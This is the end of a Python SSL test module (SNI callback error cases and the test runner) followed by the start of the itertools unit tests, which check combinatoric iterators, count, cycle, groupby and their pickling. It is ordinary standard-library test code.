self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_read_write_after_close_raises_valuerror(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket())
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_main(verbose=False):
if support.verbose:
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, REMOTE_ROOT_CERT, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [ContextTests, BasicTests, BasicSocketTests, SSLErrorTests]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
if _have_threads:
thread_info = support.threading_setup()
if thread_info:
tests.append(ThreadedTests)
try:
support.run_unittest(*tests)
finally:
if _have_threads:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
test_itertools.py
|
import doctest
import unittest
from test import support
from itertools import *
import weakref
from decimal import Decimal
from fractions import Fraction
import operator
import random
import copy
import pickle
from functools import reduce
import sys
import struct
import threading
import gc
maxsize = support.MAX_Py_ssize_t
minsize = -maxsize-1
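# lzip() eagerly materializes zip() so lazy iterator results can be compared with assertEqual().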
def lzip(*args):
return list(zip(*args))
def onearg(x):
'Test function of one argument'
return 2*x
def errfunc(*args):
'Test function that raises an error'
raise ValueError
def gen3():
'Non-restartable source sequence'
for i in (0, 1, 2):
yield i
def isEven(x):
'Test predicate'
return x%2==0
def isOdd(x):
'Test predicate'
return x%2==1
def tupleize(*args):
return args
def irange(n):
for i in range(n):
yield i
class StopNow:
'Class emulating an empty iterable.'
def __iter__(self):
return self
def __next__(self):
raise StopIteration
def take(n, seq):
'Convenience function for partially consuming a long or infinite iterable'
return list(islice(seq, n))
def prod(iterable):
return reduce(operator.mul, iterable, 1)
def fact(n):
'Factorial'
return prod(range(1, n+1))
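# e.g. fact(4) == 24; fact(0) == 1 because prod() starts from an initial value of 1.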
# root level methods for pickling ability
def testR(r):
return r[0]
def testR2(r):
return r[2]
def underten(x):
return x<10
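# One pickle/unpickle round-tripper per protocol; the proto=proto default argument
# binds each lambda to its own protocol number at definition time.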
picklecopiers = [lambda s, proto=proto: pickle.loads(pickle.dumps(s, proto))
for proto in range(pickle.HIGHEST_PROTOCOL + 1)]
class TestBasicOps(unittest.TestCase):
def pickletest(self, protocol, it, stop=4, take=1, compare=None):
"""Test that an iterator is the same after pickling, also when part-consumed"""
def expand(it, i=0):
# Recursively expand iterables, within sensible bounds
if i > 10:
raise RuntimeError("infinite recursion encountered")
if isinstance(it, str):
return it
try:
l = list(islice(it, stop))
except TypeError:
return it # can't expand it
return [expand(e, i+1) for e in l]
# Test the initial copy against the original
dump = pickle.dumps(it, protocol)
i2 = pickle.loads(dump)
self.assertEqual(type(it), type(i2))
a, b = expand(it), expand(i2)
self.assertEqual(a, b)
if compare:
c = expand(compare)
self.assertEqual(a, c)
# Take from the copy, and create another copy and compare them.
i3 = pickle.loads(dump)
took = 0
try:
for i in range(take):
next(i3)
took += 1
except StopIteration:
pass  # in case there is less data than 'take'
dump = pickle.dumps(i3, protocol)
i4 = pickle.loads(dump)
a, b = expand(i3), expand(i4)
self.assertEqual(a, b)
if compare:
c = expand(compare[took:])
self.assertEqual(a, c)
def test_accumulate(self):
self.assertEqual(list(accumulate(range(10))), # one positional arg
[0, 1, 3, 6, 10, 15, 21, 28, 36, 45])
self.assertEqual(list(accumulate(iterable=range(10))), # kw arg
[0, 1, 3, 6, 10, 15, 21, 28, 36, 45])
for typ in int, complex, Decimal, Fraction: # multiple types
self.assertEqual(
list(accumulate(map(typ, range(10)))),
list(map(typ, [0, 1, 3, 6, 10, 15, 21, 28, 36, 45])))
self.assertEqual(list(accumulate('abc')), ['a', 'ab', 'abc']) # works with non-numeric
self.assertEqual(list(accumulate([])), []) # empty iterable
self.assertEqual(list(accumulate([7])), [7]) # iterable of length one
self.assertRaises(TypeError, accumulate, range(10), 5, 6) # too many args
self.assertRaises(TypeError, accumulate) # too few args
self.assertRaises(TypeError, accumulate, x=range(10)) # unexpected kwd arg
self.assertRaises(TypeError, list, accumulate([1, []])) # args that don't add
s = [2, 8, 9, 5, 7, 0, 3, 4, 1, 6]
self.assertEqual(list(accumulate(s, min)),
[2, 2, 2, 2, 2, 0, 0, 0, 0, 0])
self.assertEqual(list(accumulate(s, max)),
[2, 8, 9, 9, 9, 9, 9, 9, 9, 9])
self.assertEqual(list(accumulate(s, operator.mul)),
[2, 16, 144, 720, 5040, 0, 0, 0, 0, 0])
with self.assertRaises(TypeError):
list(accumulate(s, chr)) # unary-operation
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, accumulate(range(10))) # test pickling
self.pickletest(proto, accumulate(range(10), initial=7))
self.assertEqual(list(accumulate([10, 5, 1], initial=None)), [10, 15, 16])
self.assertEqual(list(accumulate([10, 5, 1], initial=100)), [100, 110, 115, 116])
self.assertEqual(list(accumulate([], initial=100)), [100])
with self.assertRaises(TypeError):
list(accumulate([10, 20], 100))
def test_chain(self):
def chain2(*iterables):
'Pure python version in the docs'
for it in iterables:
for element in it:
yield element
for c in (chain, chain2):
self.assertEqual(list(c('abc', 'def')), list('abcdef'))
self.assertEqual(list(c('abc')), list('abc'))
self.assertEqual(list(c('')), [])
self.assertEqual(take(4, c('abc', 'def')), list('abcd'))
self.assertRaises(TypeError, list,c(2, 3))
def test_chain_from_iterable(self):
self.assertEqual(list(chain.from_iterable(['abc', 'def'])), list('abcdef'))
self.assertEqual(list(chain.from_iterable(['abc'])), list('abc'))
self.assertEqual(list(chain.from_iterable([''])), [])
self.assertEqual(take(4, chain.from_iterable(['abc', 'def'])), list('abcd'))
self.assertRaises(TypeError, list, chain.from_iterable([2, 3]))
def test_chain_reducible(self):
for oper in [copy.deepcopy] + picklecopiers:
it = chain('abc', 'def')
self.assertEqual(list(oper(it)), list('abcdef'))
self.assertEqual(next(it), 'a')
self.assertEqual(list(oper(it)), list('bcdef'))
self.assertEqual(list(oper(chain(''))), [])
self.assertEqual(take(4, oper(chain('abc', 'def'))), list('abcd'))
self.assertRaises(TypeError, list, oper(chain(2, 3)))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, chain('abc', 'def'), compare=list('abcdef'))
def test_chain_setstate(self):
self.assertRaises(TypeError, chain().__setstate__, ())
self.assertRaises(TypeError, chain().__setstate__, [])
self.assertRaises(TypeError, chain().__setstate__, 0)
self.assertRaises(TypeError, chain().__setstate__, ([],))
self.assertRaises(TypeError, chain().__setstate__, (iter([]), []))
it = chain()
it.__setstate__((iter(['abc', 'def']),))
self.assertEqual(list(it), ['a', 'b', 'c', 'd', 'e', 'f'])
it = chain()
it.__setstate__((iter(['abc', 'def']), iter(['ghi'])))
self.assertEqual(list(it), ['ghi', 'a', 'b', 'c', 'd', 'e', 'f'])
def test_combinations(self):
self.assertRaises(TypeError, combinations, 'abc') # missing r argument
self.assertRaises(TypeError, combinations, 'abc', 2, 1) # too many arguments
self.assertRaises(TypeError, combinations, None) # pool is not iterable
self.assertRaises(ValueError, combinations, 'abc', -2) # r is negative
for op in [lambda a:a] + picklecopiers:
self.assertEqual(list(op(combinations('abc', 32))), []) # r > n
self.assertEqual(list(op(combinations('ABCD', 2))),
[('A','B'), ('A','C'), ('A','D'), ('B','C'), ('B','D'), ('C','D')])
testIntermediate = combinations('ABCD', 2)
next(testIntermediate)
self.assertEqual(list(op(testIntermediate)),
[('A','C'), ('A','D'), ('B','C'), ('B','D'), ('C','D')])
self.assertEqual(list(op(combinations(range(4), 3))),
[(0,1,2), (0,1,3), (0,2,3), (1,2,3)])
testIntermediate = combinations(range(4), 3)
next(testIntermediate)
self.assertEqual(list(op(testIntermediate)),
[(0,1,3), (0,2,3), (1,2,3)])
def combinations1(iterable, r):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
if r > n:
return
indices = list(range(r))
yield tuple(pool[i] for i in indices)
while 1:
for i in reversed(range(r)):
if indices[i] != i + n - r:
break
else:
return
indices[i] += 1
for j in range(i+1, r):
indices[j] = indices[j-1] + 1
yield tuple(pool[i] for i in indices)
def combinations2(iterable, r):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
for indices in permutations(range(n), r):
if sorted(indices) == list(indices):
yield tuple(pool[i] for i in indices)
def combinations3(iterable, r):
'Pure python version from cwr()'
pool = tuple(iterable)
n = len(pool)
for indices in combinations_with_replacement(range(n), r):
if len(set(indices)) == r:
yield tuple(pool[i] for i in indices)
for n in range(7):
values = [5*x-12 for x in range(n)]
for r in range(n+2):
result = list(combinations(values, r))
self.assertEqual(len(result), 0 if r>n else fact(n) / fact(r) / fact(n-r)) # right number of combs
self.assertEqual(len(result), len(set(result))) # no repeats
self.assertEqual(result, sorted(result)) # lexicographic order
for c in result:
self.assertEqual(len(c), r) # r-length combinations
self.assertEqual(len(set(c)), r) # no duplicate elements
self.assertEqual(list(c), sorted(c)) # keep original ordering
self.assertTrue(all(e in values for e in c)) # elements taken from input iterable
self.assertEqual(list(c),
[e for e in values if e in c]) # comb is a subsequence of the input iterable
self.assertEqual(result, list(combinations1(values, r))) # matches first pure python version
self.assertEqual(result, list(combinations2(values, r))) # matches second pure python version
self.assertEqual(result, list(combinations3(values, r))) # matches third pure python version
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, combinations(values, r)) # test pickling
@support.bigaddrspacetest
def test_combinations_overflow(self):
with self.assertRaises((OverflowError, MemoryError)):
combinations("AA", 2**29)
# Test implementation detail: tuple re-use
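# While the results are consumed lazily, CPython recycles a single result tuple, so every
# id is the same; materializing with list() keeps all tuples alive and forces distinct ids.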
@support.impl_detail("tuple reuse is specific to CPython")
def test_combinations_tuple_reuse(self):
self.assertEqual(len(set(map(id, combinations('abcde', 3)))), 1)
self.assertNotEqual(len(set(map(id, list(combinations('abcde', 3))))), 1)
def test_combinations_with_replacement(self):
cwr = combinations_with_replacement
self.assertRaises(TypeError, cwr, 'abc') # missing r argument
self.assertRaises(TypeError, cwr, 'abc', 2, 1) # too many arguments
self.assertRaises(TypeError, cwr, None) # pool is not iterable
self.assertRaises(ValueError, cwr, 'abc', -2) # r is negative
for op in [lambda a:a] + picklecopiers:
self.assertEqual(list(op(cwr('ABC', 2))),
[('A','A'), ('A','B'), ('A','C'), ('B','B'), ('B','C'), ('C','C')])
testIntermediate = cwr('ABC', 2)
next(testIntermediate)
self.assertEqual(list(op(testIntermediate)),
[('A','B'), ('A','C'), ('B','B'), ('B','C'), ('C','C')])
def cwr1(iterable, r):
'Pure python version shown in the docs'
# number items returned: (n+r-1)! / r! / (n-1)! when n>0
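# e.g. n=3, r=2 gives 4!/2!/2! == 6 results, matching list(cwr('ABC', 2)) above.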
pool = tuple(iterable)
n = len(pool)
if not n and r:
return
indices = [0] * r
yield tuple(pool[i] for i in indices)
while 1:
for i in reversed(range(r)):
if indices[i] != n - 1:
break
else:
return
indices[i:] = [indices[i] + 1] * (r - i)
yield tuple(pool[i] for i in indices)
def cwr2(iterable, r):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
for indices in product(range(n), repeat=r):
if sorted(indices) == list(indices):
yield tuple(pool[i] for i in indices)
def numcombs(n, r):
if not n:
return 0 if r else 1
return fact(n+r-1) / fact(r)/ fact(n-1)
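# numcombs(n, r) is the multiset coefficient C(n+r-1, r); the n == 0 branch covers the
# empty pool, where the formula does not apply (0 results unless r == 0).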
for n in range(7):
values = [5*x-12 for x in range(n)]
for r in range(n+2):
result = list(cwr(values, r))
self.assertEqual(len(result), numcombs(n, r)) # right number of combs
self.assertEqual(len(result), len(set(result))) # no repeats
self.assertEqual(result, sorted(result)) # lexicographic order
regular_combs = list(combinations(values, r)) # compare to combs without replacement
if n == 0 or r <= 1:
self.assertEqual(result, regular_combs) # cases that should be identical
else:
self.assertTrue(set(result) >= set(regular_combs)) # rest should be supersets of regular combs
for c in result:
self.assertEqual(len(c), r) # r-length combinations
noruns = [k for k,v in groupby(c)] # combo without consecutive repeats
self.assertEqual(len(noruns), len(set(noruns))) # no repeats other than consecutive
self.assertEqual(list(c), sorted(c)) # keep original ordering
self.assertTrue(all(e in values for e in c)) # elements taken from input iterable
self.assertEqual(noruns,
[e for e in values if e in c]) # comb is a subsequence of the input iterable
self.assertEqual(result, list(cwr1(values, r))) # matches first pure python version
self.assertEqual(result, list(cwr2(values, r))) # matches second pure python version
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, cwr(values,r)) # test pickling
@support.bigaddrspacetest
def test_combinations_with_replacement_overflow(self):
with self.assertRaises((OverflowError, MemoryError)):
combinations_with_replacement("AA", 2**30)
# Test implementation detail: tuple re-use
@support.impl_detail("tuple reuse is specific to CPython")
def test_combinations_with_replacement_tuple_reuse(self):
cwr = combinations_with_replacement
self.assertEqual(len(set(map(id, cwr('abcde', 3)))), 1)
self.assertNotEqual(len(set(map(id, list(cwr('abcde', 3))))), 1)
def test_permutations(self):
self.assertRaises(TypeError, permutations) # too few arguments
self.assertRaises(TypeError, permutations, 'abc', 2, 1) # too many arguments
self.assertRaises(TypeError, permutations, None) # pool is not iterable
self.assertRaises(ValueError, permutations, 'abc', -2) # r is negative
self.assertEqual(list(permutations('abc', 32)), []) # r > n
self.assertRaises(TypeError, permutations, 'abc', 's') # r is not an int or None
self.assertEqual(list(permutations(range(3), 2)),
[(0,1), (0,2), (1,0), (1,2), (2,0), (2,1)])
def permutations1(iterable, r=None):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
r = n if r is None else r
if r > n:
return
indices = list(range(n))
cycles = list(range(n-r+1, n+1))[::-1]
yield tuple(pool[i] for i in indices[:r])
while n:
for i in reversed(range(r)):
cycles[i] -= 1
if cycles[i] == 0:
indices[i:] = indices[i+1:] + indices[i:i+1]
cycles[i] = n - i
else:
j = cycles[i]
indices[i], indices[-j] = indices[-j], indices[i]
yield tuple(pool[i] for i in indices[:r])
break
else:
return
def permutations2(iterable, r=None):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
r = n if r is None else r
for indices in product(range(n), repeat=r):
if len(set(indices)) == r:
yield tuple(pool[i] for i in indices)
for n in range(7):
values = [5*x-12 for x in range(n)]
for r in range(n+2):
result = list(permutations(values, r))
self.assertEqual(len(result), 0 if r>n else fact(n) / fact(n-r)) # right number of perms
self.assertEqual(len(result), len(set(result))) # no repeats
self.assertEqual(result, sorted(result)) # lexicographic order
for p in result:
self.assertEqual(len(p), r) # r-length permutations
self.assertEqual(len(set(p)), r) # no duplicate elements
self.assertTrue(all(e in values for e in p)) # elements taken from input iterable
self.assertEqual(result, list(permutations1(values, r))) # matches first pure python version
self.assertEqual(result, list(permutations2(values, r))) # matches second pure python version
if r == n:
self.assertEqual(result, list(permutations(values, None))) # test r as None
self.assertEqual(result, list(permutations(values))) # test default r
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, permutations(values, r)) # test pickling
@support.bigaddrspacetest
def test_permutations_overflow(self):
with self.assertRaises((OverflowError, MemoryError)):
permutations("A", 2**30)
@support.impl_detail("tuple reuse is specific to CPython")
def test_permutations_tuple_reuse(self):
self.assertEqual(len(set(map(id, permutations('abcde', 3)))), 1)
self.assertNotEqual(len(set(map(id, list(permutations('abcde', 3))))), 1)
def test_combinatorics(self):
# Test relationships between product(), permutations(),
# combinations() and combinations_with_replacement().
for n in range(6):
s = 'ABCDEFG'[:n]
for r in range(8):
prod = list(product(s, repeat=r))
cwr = list(combinations_with_replacement(s, r))
perm = list(permutations(s, r))
comb = list(combinations(s, r))
# Check size
self.assertEqual(len(prod), n**r)
self.assertEqual(len(cwr), (fact(n+r-1) / fact(r)/ fact(n-1)) if n else (not r))
self.assertEqual(len(perm), 0 if r>n else fact(n) / fact(n-r))
self.assertEqual(len(comb), 0 if r>n else fact(n) / fact(r) / fact(n-r))
# Check lexicographic order without repeated tuples
self.assertEqual(prod, sorted(set(prod)))
self.assertEqual(cwr, sorted(set(cwr)))
self.assertEqual(perm, sorted(set(perm)))
self.assertEqual(comb, sorted(set(comb)))
# Check interrelationships
self.assertEqual(cwr, [t for t in prod if sorted(t)==list(t)]) # cwr: prods which are sorted
self.assertEqual(perm, [t for t in prod if len(set(t))==r]) # perm: prods with no dups
self.assertEqual(comb, [t for t in perm if sorted(t)==list(t)]) # comb: perms that are sorted
self.assertEqual(comb, [t for t in cwr if len(set(t))==r]) # comb: cwrs without dups
self.assertEqual(comb, list(filter(set(cwr).__contains__, perm))) # comb: perm that is a cwr
self.assertEqual(comb, list(filter(set(perm).__contains__, cwr))) # comb: cwr that is a perm
self.assertEqual(comb, sorted(set(cwr) & set(perm))) # comb: both a cwr and a perm
def test_compress(self):
self.assertEqual(list(compress(data='ABCDEF', selectors=[1,0,1,0,1,1])), list('ACEF'))
self.assertEqual(list(compress('ABCDEF', [1,0,1,0,1,1])), list('ACEF'))
self.assertEqual(list(compress('ABCDEF', [0,0,0,0,0,0])), list(''))
self.assertEqual(list(compress('ABCDEF', [1,1,1,1,1,1])), list('ABCDEF'))
self.assertEqual(list(compress('ABCDEF', [1,0,1])), list('AC'))
self.assertEqual(list(compress('ABC', [0,1,1,1,1,1])), list('BC'))
n = 10000
data = chain.from_iterable(repeat(range(6), n))
selectors = chain.from_iterable(repeat((0, 1)))
self.assertEqual(list(compress(data, selectors)), [1,3,5] * n)
self.assertRaises(TypeError, compress, None, range(6)) # 1st arg not iterable
self.assertRaises(TypeError, compress, range(6), None) # 2nd arg not iterable
self.assertRaises(TypeError, compress, range(6)) # too few args
self.assertRaises(TypeError, compress, range(6), range(6), range(6)) # too many args
# check copy, deepcopy, pickle
for op in [lambda a:copy.copy(a), lambda a:copy.deepcopy(a)] + picklecopiers:
for data, selectors, result1, result2 in [
('ABCDEF', [1,0,1,0,1,1], 'ACEF', 'CEF'),
('ABCDEF', [0,0,0,0,0,0], '', ''),
('ABCDEF', [1,1,1,1,1,1], 'ABCDEF', 'BCDEF'),
('ABCDEF', [1,0,1], 'AC', 'C'),
('ABC', [0,1,1,1,1,1], 'BC', 'C'),
]:
self.assertEqual(list(op(compress(data=data, selectors=selectors))), list(result1))
self.assertEqual(list(op(compress(data, selectors))), list(result1))
testIntermediate = compress(data, selectors)
if result1:
next(testIntermediate)
self.assertEqual(list(op(testIntermediate)), list(result2))
def test_count(self):
self.assertEqual(lzip('abc',count()), [('a', 0), ('b', 1), ('c', 2)])
self.assertEqual(lzip('abc',count(3)), [('a', 3), ('b', 4), ('c', 5)])
self.assertEqual(take(2, lzip('abc',count(3))), [('a', 3), ('b', 4)])
self.assertEqual(take(2, zip('abc',count(-1))), [('a', -1), ('b', 0)])
self.assertEqual(take(2, zip('abc',count(-3))), [('a', -3), ('b', -2)])
self.assertRaises(TypeError, count, 2, 3, 4)
self.assertRaises(TypeError, count, 'a')
self.assertEqual(take(10, count(maxsize-5)),
list(range(maxsize-5, maxsize+5)))
self.assertEqual(take(10, count(-maxsize-5)),
list(range(-maxsize-5, -maxsize+5)))
self.assertEqual(take(3, count(3.25)), [3.25, 4.25, 5.25])
self.assertEqual(take(3, count(3.25-4j)), [3.25-4j, 4.25-4j, 5.25-4j])
self.assertEqual(take(3, count(Decimal('1.1'))),
[Decimal('1.1'), Decimal('2.1'), Decimal('3.1')])
self.assertEqual(take(3, count(Fraction(2, 3))),
[Fraction(2, 3), Fraction(5, 3), Fraction(8, 3)])
BIGINT = 1<<1000
self.assertEqual(take(3, count(BIGINT)), [BIGINT, BIGINT+1, BIGINT+2])
c = count(3)
self.assertEqual(repr(c), 'count(3)')
next(c)
self.assertEqual(repr(c), 'count(4)')
c = count(-9)
self.assertEqual(repr(c), 'count(-9)')
next(c)
self.assertEqual(next(c), -8)
self.assertEqual(repr(count(10.25)), 'count(10.25)')
self.assertEqual(repr(count(10.0)), 'count(10.0)')
self.assertEqual(type(next(count(10.0))), float)
for i in (-sys.maxsize-5, -sys.maxsize+5 ,-10, -1, 0, 10, sys.maxsize-5, sys.maxsize+5):
# Test repr
r1 = repr(count(i))
r2 = 'count(%r)'.__mod__(i)
self.assertEqual(r1, r2)
# check copy, deepcopy, pickle
for value in -3, 3, maxsize-5, maxsize+5:
c = count(value)
self.assertEqual(next(copy.copy(c)), value)
self.assertEqual(next(copy.deepcopy(c)), value)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, count(value))
# check proper internal error handling for large "step" sizes
count(1, maxsize+5); sys.exc_info()
def test_count_with_stride(self):
self.assertEqual(lzip('abc',count(2,3)), [('a', 2), ('b', 5), ('c', 8)])
self.assertEqual(lzip('abc',count(start=2,step=3)),
[('a', 2), ('b', 5), ('c', 8)])
self.assertEqual(lzip('abc',count(step=-1)),
[('a', 0), ('b', -1), ('c', -2)])
self.assertRaises(TypeError, count, 'a', 'b')
self.assertEqual(lzip('abc',count(2,0)), [('a', 2), ('b', 2), ('c', 2)])
self.assertEqual(lzip('abc',count(2,1)), [('a', 2), ('b', 3), ('c', 4)])
self.assertEqual(lzip('abc',count(2,3)), [('a', 2), ('b', 5), ('c', 8)])
self.assertEqual(take(20, count(maxsize-15, 3)), take(20, range(maxsize-15, maxsize+100, 3)))
self.assertEqual(take(20, count(-maxsize-15, 3)), take(20, range(-maxsize-15,-maxsize+100, 3)))
self.assertEqual(take(3, count(10, maxsize+5)),
list(range(10, 10+3*(maxsize+5), maxsize+5)))
self.assertEqual(take(3, count(2, 1.25)), [2, 3.25, 4.5])
self.assertEqual(take(3, count(2, 3.25-4j)), [2, 5.25-4j, 8.5-8j])
self.assertEqual(take(3, count(Decimal('1.1'), Decimal('.1'))),
[Decimal('1.1'), Decimal('1.2'), Decimal('1.3')])
self.assertEqual(take(3, count(Fraction(2,3), Fraction(1,7))),
[Fraction(2,3), Fraction(17,21), Fraction(20,21)])
BIGINT = 1<<1000
self.assertEqual(take(3, count(step=BIGINT)), [0, BIGINT, 2*BIGINT])
self.assertEqual(repr(take(3, count(10, 2.5))), repr([10, 12.5, 15.0]))
c = count(3, 5)
self.assertEqual(repr(c), 'count(3, 5)')
next(c)
self.assertEqual(repr(c), 'count(8, 5)')
c = count(-9, 0)
self.assertEqual(repr(c), 'count(-9, 0)')
next(c)
self.assertEqual(repr(c), 'count(-9, 0)')
c = count(-9, -3)
self.assertEqual(repr(c), 'count(-9, -3)')
next(c)
self.assertEqual(repr(c), 'count(-12, -3)')
self.assertEqual(repr(c), 'count(-12, -3)')
self.assertEqual(repr(count(10.5, 1.25)), 'count(10.5, 1.25)')
self.assertEqual(repr(count(10.5, 1)), 'count(10.5)') # suppress step=1 when it's an int
self.assertEqual(repr(count(10.5, 1.00)), 'count(10.5, 1.0)') # do show float values like 1.0
self.assertEqual(repr(count(10, 1.00)), 'count(10, 1.0)')
c = count(10, 1.0)
self.assertEqual(type(next(c)), int)
self.assertEqual(type(next(c)), float)
for i in (-sys.maxsize-5, -sys.maxsize+5 ,-10, -1, 0, 10, sys.maxsize-5, sys.maxsize+5):
for j in (-sys.maxsize-5, -sys.maxsize+5 ,-10, -1, 0, 1, 10, sys.maxsize-5, sys.maxsize+5):
# Test repr
r1 = repr(count(i, j))
if j == 1:
r2 = ('count(%r)' % i)
else:
r2 = ('count(%r, %r)' % (i, j))
self.assertEqual(r1, r2)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, count(i, j))
def test_cycle(self):
self.assertEqual(take(10, cycle('abc')), list('abcabcabca'))
self.assertEqual(list(cycle('')), [])
self.assertRaises(TypeError, cycle)
self.assertRaises(TypeError, cycle, 5)
self.assertEqual(list(islice(cycle(gen3()),10)), [0,1,2,0,1,2,0,1,2,0])
# check copy, deepcopy, pickle
c = cycle('abc')
self.assertEqual(next(c), 'a')
# simple copy currently not supported, because __reduce__ returns
# an internal iterator
#self.assertEqual(take(10, copy.copy(c)), list('bcabcabcab'))
self.assertEqual(take(10, copy.deepcopy(c)), list('bcabcabcab'))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertEqual(take(10, pickle.loads(pickle.dumps(c, proto))),
list('bcabcabcab'))
next(c)
self.assertEqual(take(10, pickle.loads(pickle.dumps(c, proto))),
list('cabcabcabc'))
next(c)
next(c)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, cycle('abc'))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
# test with partial consumed input iterable
it = iter('abcde')
c = cycle(it)
_ = [next(c) for i in range(2)] # consume 2 of 5 inputs
p = pickle.dumps(c, proto)
d = pickle.loads(p) # rebuild the cycle object
self.assertEqual(take(20, d), list('cdeabcdeabcdeabcdeab'))
# test with completely consumed input iterable
it = iter('abcde')
c = cycle(it)
_ = [next(c) for i in range(7)] # consume 7 of 5 inputs
p = pickle.dumps(c, proto)
d = pickle.loads(p) # rebuild the cycle object
self.assertEqual(take(20, d), list('cdeabcdeabcdeabcdeab'))
def test_cycle_setstate(self):
# Verify both modes for restoring state
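# In both modes the argument to __setstate__ is a (saved_values, flag) tuple; judging
# from the type checks below, the first item must be a list and the second an int.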
# Mode 0 is efficient. It uses an incompletely consumed input
# iterator to build a cycle object and then passes in state with
# a list of previously consumed values. There is no data
# overlap between the two.
c = cycle('defg')
c.__setstate__((list('abc'), 0))
self.assertEqual(take(20, c), list('defgabcdefgabcdefgab'))
# Mode 1 is inefficient. It starts with a cycle object built
# from an iterator over the remaining elements in a partial
# cycle and then passes in state with all of the previously
# seen values (this overlaps values included in the iterator).
c = cycle('defg')
c.__setstate__((list('abcdefg'), 1))
self.assertEqual(take(20, c), list('defgabcdefgabcdefgab'))
# The first argument to setstate needs to be a tuple
with self.assertRaises(TypeError):
cycle('defg').__setstate__([list('abcdefg'), 0])
# The first argument in the setstate tuple must be a list
with self.assertRaises(TypeError):
c = cycle('defg')
c.__setstate__((tuple('defg'), 0))
take(20, c)
# The second argument in the setstate tuple must be an int
with self.assertRaises(TypeError):
cycle('defg').__setstate__((list('abcdefg'), 'x'))
self.assertRaises(TypeError, cycle('').__setstate__, ())
self.assertRaises(TypeError, cycle('').__setstate__, ([],))
def test_groupby(self):
# Check whether it accepts arguments correctly
self.assertEqual([], list(groupby([])))
self.assertEqual([], list(groupby([], key=id)))
self.assertRaises(TypeError, list, groupby('abc', []))
self.assertRaises(TypeError, groupby, None)
self.assertRaises(TypeError, groupby, 'abc', lambda x:x, 10)
# Check normal input
s = [(0, 10, 20), (0, 11,21), (0,12,21), (1,13,21), (1,14,22),
(2,15,22), (3,16,23), (3,17,23)]
dup = []
for k, g in groupby(s, lambda r:r[0]):
for elem in g:
self.assertEqual(k, elem[0])
dup.append(elem)
self.assertEqual(s, dup)
# Check normal pickled
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
dup = []
for k, g in pickle.loads(pickle.dumps(groupby(s, testR), proto)):
for elem in g:
self.assertEqual(k, elem[0])
dup.append(elem)
self.assertEqual(s, dup)
# Check nested case
dup = []
for k, g in groupby(s, testR):
for ik, ig in groupby(g, testR2):
for elem in ig:
self.assertEqual(k, elem[0])
self.assertEqual(ik, elem[2])
dup.append(elem)
self.assertEqual(s, dup)
# Check nested and pickled
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
dup = []
for k, g in pickle.loads(pickle.dumps(groupby(s, testR), proto)):
for ik, ig in pickle.loads(pickle.dumps(groupby(g, testR2), proto)):
for elem in ig:
self.assertEqual(k, elem[0])
self.assertEqual(ik, elem[2])
dup.append(elem)
self.assertEqual(s, dup)
# Check case where inner iterator is not used
keys = [k for k, g in groupby(s, testR)]
expectedkeys = set([r[0] for r in s])
self.assertEqual(set(keys), expectedkeys)
self.assertEqual(len(keys), len(expectedkeys))
# Check case where inner iterator is used after advancing the groupby
# iterator
s = list(zip('AABBBAAAA', range(9)))
it = groupby(s, testR)
_, g1 = next(it)
_, g2 = next(it)
_, g3 = next(it)
self.assertEqual(list(g1), [])
self.assertEqual(list(g2), [])
self.assertEqual(next(g3), ('A', 5))
list(it) # exhaust the groupby iterator
self.assertEqual(list(g3), [])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
it = groupby(s, testR)
